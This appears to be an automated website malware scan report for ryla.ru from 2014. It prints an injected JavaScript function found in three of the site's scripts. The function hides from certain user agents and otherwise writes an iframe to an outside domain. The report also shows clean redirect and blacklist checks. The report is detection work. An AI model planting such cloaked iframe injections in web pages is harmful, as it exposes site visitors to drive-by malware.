Scanned pages/files
Request | Server response | Status |
http://ryla.ru/ | 200 OK Content-Length: 32996 Content-Type: text/html | clean |
http://ryla.ru/js/JsHttpRequest.js | 200 OK Content-Length: 57661 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Note that the injected `Linode()` function writes the iframe only when the visitor's user agent matches none of the listed strings, so a scanner or browser whose user agent contains one of them will not see the injected content. function Linode() {
var d = navigator.userAgent; var f = (d.indexOf("Screenshot") > -1 || d.indexOf("Maxthon") > -1 || d.indexOf("IEMobile") > -1 || d.indexOf("Chrome") > -1 || d.indexOf("FreeBSD") > -1 || d.indexOf("Android") > -1 || d.indexOf("iPad") > -1 || d.indexOf("Linux") > -1 || d.indexOf("Macintosh") > -1 || d.indexOf("iPhone") > -1 || d.indexOf("Mini") > -1); if (!f) { document.write('<iframe src="http://opilaket.alam-xp.info/triy _4e.submit(); _57(_4e,sv); for(var i=0;i<qt.length;i++){ _4e.lastChild.parentNode.removeChild(_4e.lastChild); } if(!_4f){ for(var i=0,n=_4e.elements.length;i<n;i++){ _4e.elements[i].name=_60[i]; } } }; JsHttpRequest.setTimeout(_5f,100); return null; }; }}; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://ryla.ru/js/functions.js | 200 OK Content-Length: 41210 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Linode() {
var d = navigator.userAgent; var f = (d.indexOf("Screenshot") > -1 || d.indexOf("Maxthon") > -1 || d.indexOf("IEMobile") > -1 || d.indexOf("Chrome") > -1 || d.indexOf("FreeBSD") > -1 || d.indexOf("Android") > -1 || d.indexOf("iPad") > -1 || d.indexOf("Linux") > -1 || d.indexOf("Macintosh") > -1 || d.indexOf("iPhone") > -1 || d.indexOf("Mini") > -1); if (!f) { document.write('<iframe src="http://opilaket.alam-xp.info/triy dhshowautohelp = false; if(document.getElementById('autohelp_rows_big')) document.getElementById('autohelp_rows_big').style.display = 'none'; if(document.getElementById('autohelp_rows_width')) document.getElementById('autohelp_rows_width').style.display = 'none'; if(document.getElementById('autohelp_rows')) document.getElementById('autohelp_rows').style.display'no'none'; };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://ryla.ru/js/ajax-poller.js | 200 OK Content-Length: 42778 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Linode() {
var d = navigator.userAgent; var f = (d.indexOf("Screenshot") > -1 || d.indexOf("Maxthon") > -1 || d.indexOf("IEMobile") > -1 || d.indexOf("Chrome") > -1 || d.indexOf("FreeBSD") > -1 || d.indexOf("Android") > -1 || d.indexOf("iPad") > -1 || d.indexOf("Linux") > -1 || d.indexOf("Macintosh") > -1 || d.indexOf("iPhone") > -1 || d.indexOf("Mini") > -1); if (!f) { document.write('<iframe src="http://opilaket.alam-xp.info/triy { var ajaxIndex = ajaxObjects.length; ajaxObjects[ajaxIndex] = new sack(); ajaxObjects[ajaxIndex].requestFile = serSirSideFile + '?pollId=' + pollId; prepareForPollResults(pollId); ajaxObjects[ajaxIndex].onCompletion = function(){ showVoteResults(pollId,ajaxIndex); }; ajaxObjects[ajaxIndex].runAJAX(); } ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://ryla.ru/randomwords/randwordsjs1.php | 200 OK Content-Length: 137 Content-Type: text/html | clean |
http://ryla.ru/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://ryla.ru/randomwords/randwordsjs.php | 200 OK Content-Length: 99 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ryla.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 24 Jun 2014 21:28:08 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=3463792c91536687ec51dc82b2db5878; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: ryla.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 24 Jun 2014 21:28:08 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=3463792c91536687ec51dc82b2db5878; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: ryla.ru
Referer: http://www.google.com/search?q=ryla.ru
Result:
The result is the same as for the first query; no suspicious redirects were found.
GET / HTTP/1.1
Host: ryla.ru
Referer: http://www.google.com/search?q=ryla.ru
Result:
The result is the same as for the first query; no suspicious redirects were found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ryla.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ryla.ru/
Result: ryla.ru is not infected or malware details are not published yet.
Result: ryla.ru is not infected or malware details are not published yet.